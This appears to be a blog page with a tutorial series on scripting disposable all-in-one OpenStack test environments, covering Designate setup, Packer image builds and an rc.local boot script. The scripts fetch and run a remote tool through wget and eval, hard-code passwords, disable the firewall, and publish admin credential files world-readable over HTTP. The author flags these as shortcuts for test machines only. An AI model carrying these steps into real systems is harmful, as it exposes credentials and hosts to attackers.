+ openstack role add --project services --user designate admin
+ openstack service create --name designate --description "DNS" dns
+ openstack endpoint create --region RegionOne dns public http://127.0.0.1:9001/
+
+ mysql -e "CREATE DATABASE designate CHARACTER SET utf8 COLLATE utf8_general_ci"
+ mysql -e "CREATE DATABASE designate_pool_manager"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate_pool_manager.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y crudini
+
+ yum install -y openstack-designate\*
+
+ cp /home/centos/files/pools.yaml /etc/designate/
+
+ designate_conf="/etc/designate/designate.conf"
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT notification_driver messaging
+ crudini --set $designate_conf service:api enabled_extensions_v2 "quotas, reports"
+ crudini --set $designate_conf keystone_authtoken auth_uri http://127.0.0.1:5000
+ crudini --set $designate_conf keystone_authtoken auth_url http://127.0.0.1:35357
+ crudini --set $designate_conf keystone_authtoken username designate
+ crudini --set $designate_conf keystone_authtoken password password
+ crudini --set $designate_conf keystone_authtoken project_name services
+ crudini --set $designate_conf keystone_authtoken auth_type password
+ crudini --set $designate_conf service:worker enabled true
+ crudini --set $designate_conf service:worker notify true
+ crudini --set $designate_conf storage:sqlalchemy connection mysql+pymysql://designate:password@127.0.0.1/designate
+
+ sudo -u designate designate-manage database sync
+
+ systemctl enable designate-central designate-api
+ systemctl enable designate-worker designate-producer designate-mdns
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+
+ sudo -u designate designate-manage pool update

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service
+ systemctl stop designate-central designate-api
+ systemctl stop designate-worker designate-producer designate-mdns

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are several steps happening above:

  1. The openstack command is used to create a new service account called designate. A catalog endpoint is also created.
  2. A database called designate is created.
  3. A utility called crudini is installed. This is an amazing little tool to help modify ini files on the command-line.
  4. Designate is installed.
  5. A bundled pools.yaml file is copied to /etc/designate. I'll show the contents of this file soon.
  6. crudini is used to configure /etc/designate/designate.conf.
  7. The Designate database's schema is imported using the designate-manage command.
  8. The Designate services are enabled in systemd.
  9. designate-manage is again used, this time to update the DNS pools.
  10. The Designate services are added to the list of services to stop before the image/snapshot is created.

These steps roughly follow what was pulled from the Designate Installation Guide linked to earlier.

As mentioned, a pools.yaml file is copied from the files directory. Create a file called terraform-openstack-test/packer/files/pools.yaml with the following contents:

---

- name: default
  description: Default PowerDNS Pool
  attributes: {}
  ns_records:
    - hostname: ns.example.com.
      priority: 1

  nameservers:
    - host: 127.0.0.1
      port: 53

  targets:
    - type: pdns4
      description: PowerDNS4 DNS Server
      masters:
        - host: 127.0.0.1
          port: 5354

      # PowerDNS Configuration options
      options:
        host: 127.0.0.1
        port: 53
        api_endpoint: http://127.0.0.1:8081
        api_token: someapikey

Finally, modify the rc.local file:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

  public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
  if [[ -n $public_ip ]]; then
    while true ; do
      mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
      if [[ $? == 0 ]]; then
        break
      fi
      sleep 10
    done

    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
  fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

  systemctl restart openstack-cinder-api.service
  systemctl restart openstack-cinder-backup.service
  systemctl restart openstack-cinder-scheduler.service
  systemctl restart openstack-cinder-volume.service
  systemctl restart openstack-nova-cert.service
  systemctl restart openstack-nova-compute.service
  systemctl restart openstack-nova-conductor.service
  systemctl restart openstack-nova-consoleauth.service
  systemctl restart openstack-nova-novncproxy.service
  systemctl restart openstack-nova-scheduler.service
  systemctl restart neutron-dhcp-agent.service
  systemctl restart neutron-l3-agent.service
  systemctl restart neutron-lbaasv2-agent.service
  systemctl restart neutron-metadata-agent.service
  systemctl restart neutron-openvswitch-agent.service
  systemctl restart neutron-metering-agent.service
  systemctl restart httpd
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+ systemctl restart pdns

  nova-manage cell_v2 discover_hosts

+ sudo -u designate designate-manage pool update
+
+ iptables -I INPUT -p tcp --dport 9001 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 9001 -j ACCEPT
+
  iptables -I INPUT -p tcp --dport 80 -j ACCEPT
  ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
  cp /root/keystonerc* /var/www/html
  chmod 666 /var/www/html/keystonerc*

The above steps have been added:

  1. The Designate services have been added to the list of services to be restarted during boot.
  2. PowerDNS is also restarted
  3. designate-manage is again used to update the DNS pools.
  4. Port 9001 is opened for traffic.

Build the Image and Launch

With the above in place, you can regenerate your image using Packer and then launch a virtual machine using Terraform.

When the virtual machine is up and running, you'll find that your testing environment is now running OpenStack Designate.

Conclusion

This blog post covered how to add a service to your OpenStack testing environment that is not supported by PackStack. This was done by reviewing the steps to manually install and configure the service, translating those steps to automated commands, and adding those commands to the existing deployment scripts.

October 09, 2017 06:00 AM

October 07, 2017

Joe Topjian

Building OpenStack Environments Part 2

Introduction

In the last post, I detailed how to create an all-in-one OpenStack environment in an isolated virtual machine for the purpose of testing OpenStack-based applications.

In this post, I'll cover how to create an image from the environment. This will allow you to launch virtual machines which already have the OpenStack environment installed and running. The benefits of this approach is that it reduces the time required to build the environment as well as pins the environment to a known working version.

In addition, I'll cover how to modify the all-in-one environment so that it can be accessed remotely. This way, testing does not have to be done locally on the virtual machine.

Note: I realize the title of this series might be a misnomer. This series is is not covering how to deploy OpenStack in general, but how to set up disposable OpenStack environments for testing purposes. Blame line wrapping.

How to Generate the Image

AWS and OpenStack (and any other cloud provider) provide the ability to create an image (whether AMI, qcow, etc) from a running virtual machine. This is commonly known as "snapshotting".

The process described here will use snapshotting, but it's not that simple. OpenStack has a lot of moving pieces and some of those pieces are dependent on unique configurations of the host: the hostname, the IP address(es), etc. These items must be accounted for and configured correctly on the new virtual machine.

With this in mind, the process of generating an image is roughly:

  1. Launch a virtual machine.
  2. Install an all-in-one OpenStack environment.
  3. Remove any unique information from the OpenStack databases.
  4. Snapshot.
  5. Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

Creating a Reusable OpenStack Image

Just like in Part 1, it's best to ensure this entire process is automated. Terraform works great to provision and deploy infrastructure, but it is not suited to provide a niche task such as snapshotting.

Fortunately, there's Packer. And even more fortunate is that Packer supports a wide array of cloud services.

If you haven't used Packer before, I recommend going through the intro before proceeding here.

In Part 1, I used AWS as the cloud being deployed to. For this part, I'll switch things up and use an OpenStack cloud.

Creating a Simple Image

To begin, you can continue using the same terraform-openstack-test directory that was used in Part 1.

First, create a new directory called packer/openstack:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir -p packer/openstack
$ cd packer/openstack

Next, create a file called build.json with the following contents:


{
  "builders": [{
    "type": "openstack",
    "image_name": "packstack-ocata",
    "reuse_ips": true,
    "ssh_username": "centos",

    "flavor": "{{user `flavor`}}",
    "security_groups": ["{{user `secgroup`}}"],
    "source_image": "{{user `image_id`}}",
    "floating_ip_pool": "{{user `pool`}}",
    "networks": ["{{user `network_id`}}"]
  }]
}

I've broken the above into two sections: the top section has hard-coded values while the bottom section requires input on the command-line. This is because the values will vary between your OpenStack cloud and my OpenStack cloud.

With the above in place, run:

$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Note the following: the image_id must be a CentOS 7 image and the Security Group must allow traffic from your workstation to Port 22.

This command will take some time to complete. When it has finished, it will print the UUID of a newly generated image:

==> Builds finished. The artifacts of successful builds are:
--> openstack: An image was created: 53ecc829-60c0-4a87-81f4-9fc603ff2a8f

That UUID will point to an image titled "packstack-ocata".

Congratulations! You just created an image.

However, there is virtually nothing different about "packstack-ocata" and the CentOS image used to create it. All Packer did was launch a virtual machine and create a snapshot of it.

In order for Packer to make changes to the virtual machine, you must configure "provisioners" in the build.json file. Provisioners are just like Terraform's concept of provisioners: steps that will execute commands on the running virtual machine. Before you can add some provisioners to the Packer build file, you first need to generate the scripts which will be run.

Generating an Answer File

In Part 1, PackStack was used to install an all-in-one OpenStack environment. The command used was:

$ packstack --allinone

This very simple command will use a lot of sane defaults and the result will be a fully functionall all-in-one environment.

However, in order to more easily make the OpenStack environment run correctly each time a virtual machine is created, the installation needs tuned. To do this, a custom "answer file" will be used when running PackStack.

An answer file is a file which contains each configurable setting within PackStack. This file is very large with lots of options. It's not something you want to write from scratch. Instead, PackStack can generate an answer file to be used as a template.

On a CentOS 7 virtual machine, which can even be the same virtual machine you created in Part 1, run:

$ packstack --gen-answer-file=packstack-answers.txt

Copy the file to your workstation using scp or some other means. Make a directory called files to store this answer file:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir packer/files
$ scp -i key/id_rsa centos@<ip>:packstack-answers.txt packer/files

Once stored locally, make the following changes:

First, locate the setting CONFIG_CONTROLLER_HOST. This setting will have the value of an IP address local to the virtual machine which generated this file:

CONFIG_CONTROLLER_HOST=10.41.8.200

Do a global search and replace of 10.41.8.200 with 127.0.0.1.

Next, use this opportunity to tune which services you want to enable for your test environment. For example:

- CONFIG_HORIZON_INSTALL=y
+ CONFIG_HORIZON_INSTALL=n
- CONFIG_CEILOMETER_INSTALL=y
+ CONFIG_CEILOMETER_INSTALL=n
- CONFIG_AODH_INSTALL=y
+ CONFIG_AODH_INSTALL=n
- CONFIG_GNOCCHI_INSTALL=y
+ CONFIG_GNOCCHI_INSTALL=n
- CONFIG_LBAAS_INSTALL=n
+ CONFIG_LBAAS_INSTALL=y
- CONFIG_NEUTRON_FWAAS=n
+ CONFIG_NEUTRON_FWAAS=y

These are all services I have personally changed the status of since either they are disabled by default and I want them enabled or they are enabled by default and I do not need them. Change the values to suit your needs.

You might notice that there are several embedded passwords and secrets in this answer file. Astute readers will realize that these passwords will all be used for every virtual machine created with this answer file. For production use, this is most definitely not secure. However, I consider this relatively safe since these OpenStack environments are temporary and only for testing.

Installing OpenStack

Next, begin building a deploy.sh script. You can re-use the deploy.sh script from Part 1 as a start, with one initial change:

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
- packstack --allinone
+ packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

Next, alter packer/openstack/build.json with the following:


  {
    "builders": [{
      "type": "openstack",
      "image_name": "packstack-ocata",
      "reuse_ips": true,
      "ssh_username": "centos",

      "flavor": "{{user `flavor`}}",
      "security_groups": ["{{user `secgroup`}}"],
      "source_image": "{{user `image_id`}}",
      "floating_ip_pool": "{{user `pool`}}",
      "networks": ["{{user `network_id`}}"]
-   }]
+   }],
+   "provisioners": [
+     {
+       "type": "file",
+       "source": "../files",
+       "destination": "/home/centos/files"
+     },
+     {
+       "type": "shell",
+       "inline": [
+         "sudo bash /home/centos/files/deploy.sh"
+       ]
+     }
+   ]
  }

There are two provisioners being created here: one which will copy the files directory to /home/centos/files and one to run the deploy.sh script.

files was created outside of the openstack directory because these files are not unique to OpenStack. You can use the same files to build images in other clouds. For example, create a packer/aws directory and create a similar build.json file for AWS.

With that in place, run… actually, don't run yet. I'll save you a step. While the current configuration will launch an instance, install an all-in-one OpenStack environment, and create a snapshot, OpenStack will not work correctly when you create a virtual machine based on that image.

In order for it to work correctly, there are some more modifications which need made to make sure OpenStack starts correctly on a new virtual machine.

Removing Unique Data

In order to remove the unique data of the OpenStack environment, add the following to deploy.sh:

+ hostnamectl set-hostname localhost
+
  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF
+
+ systemctl stop openstack-cinder-backup.service
+ systemctl stop openstack-cinder-scheduler.service
+ systemctl stop openstack-cinder-volume.service
+ systemctl stop openstack-nova-cert.service
+ systemctl stop openstack-nova-compute.service
+ systemctl stop openstack-nova-conductor.service
+ systemctl stop openstack-nova-consoleauth.service
+ systemctl stop openstack-nova-novncproxy.service
+ systemctl stop openstack-nova-scheduler.service
+ systemctl stop neutron-dhcp-agent.service
+ systemctl stop neutron-l3-agent.service
+ systemctl stop neutron-lbaasv2-agent.service
+ systemctl stop neutron-metadata-agent.service
+ systemctl stop neutron-openvswitch-agent.service
+ systemctl stop neutron-metering-agent.service
+
+ mysql -e "update services set deleted_at=now(), deleted=id" cinder
+ mysql -e "update services set deleted_at=now(), deleted=id" nova
+ mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
+ for i in $(openstack network agent list -c ID -f value); do
+   neutron agent-delete $i
+ done
+
+ systemctl stop httpd

The above added 3 pieces to deploy.sh: set the hostname to localhost, stop all OpenStack services, and then delete all known agents for Cinder, Nova, and Neutron.

Now, with the above in place, run… no, not yet, either.

Remember the last step outlined in the beginning of this post:

Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

How is the new virtual machine going to configure itself with new information? One solution is to create an rc.local file and place it in the /etc directory during the Packer provisioning phase. This way, when the virtual machine launches, rc.local is triggered and acts as a post-boot script.

Adding an rc.local File

First, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

+ cp /home/centos/files/rc.local /etc
+ chmod +x /etc/rc.local

Next, create a file called rc.local inside the packstack/files directory:

#!/bin/bash
set -x

export HOME=/root

sleep 60

systemctl restart rabbitmq-server
while [[ true ]]; do
  pgrep -f rabbit
  if [[ $? == 0 ]]; then
    break
  fi
  sleep 10
  systemctl restart rabbitmq-server
done

nova-manage cell_v2 discover_hosts

The above is pretty simple: it's simply restarting RabbitMQ and running nova-manage to re-discover itself as a compute node.

Why restart RabbitMQ? I have no idea. I've found it needs to be done for OpenStack to work correctly.

I also mentioned I'll show how to to access the OpenStack services from outside the virtual machine, so you don't have to log in to the virtual machine to run tests.

To do that, add the following to rc.local:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

+ public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
+ if [[ -n $public_ip ]]; then
+   while true ; do
+     mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
+     if [[ $? == 0 ]]; then
+       break
+     fi
+     sleep 10
+   done

+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
+ fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

+ systemctl restart openstack-cinder-api.service
+ systemctl restart openstack-cinder-backup.service
+ systemctl restart openstack-cinder-scheduler.service
+ systemctl restart openstack-cinder-volume.service
+ systemctl restart openstack-nova-cert.service
+ systemctl restart openstack-nova-compute.service
+ systemctl restart openstack-nova-conductor.service
+ systemctl restart openstack-nova-consoleauth.service
+ systemctl restart openstack-nova-novncproxy.service
+ systemctl restart openstack-nova-scheduler.service
+ systemctl restart neutron-dhcp-agent.service
+ systemctl restart neutron-l3-agent.service
+ systemctl restart neutron-lbaasv2-agent.service
+ systemctl restart neutron-metadata-agent.service
+ systemctl restart neutron-openvswitch-agent.service
+ systemctl restart neutron-metering-agent.service
+ systemctl restart httpd

  nova-manage cell_v2 discover_hosts

+ iptables -I INPUT -p tcp --dport 80 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
+ cp /root/keystonerc* /var/www/html
+ chmod 666 /var/www/html/keystonerc*

Three steps have been added above:

The first uses cloud-init to discover the virtual machine's public IP. Once the public IP is known, the endpoint table in the keystone database is updated with it. By default, PackStack sets the endpoints of the Keystone catalog to 127.0.0.1. This prevents outside interaction of OpenStack. Changing it to the public IP resolves this issue.

The keystonerc_demo and keystonerc_admin files are also updated with the public IP.

Why not just set the public IP in the PackStack answer file? Because the public IP will not be known until the virtual machine launches, which is after PackStack has run. And that's why 127.0.0.1 was used earlier: it's an easy placeholder to search and replace with and it will still create a working OpenStack environment if it wasn't replaced.

The second stop restarts all OpenStack services so they're aware of the new endpoints.

The third step copies the keystonerc_demo and keystonerc_admin files to /var/www/html/. This way, you can wget the files from http://public-ip/keystonerc_demo and http://public-ip/keystonerc_admin and save them to your workstation. You can then source them and begin interacting with OpenStack remotely.

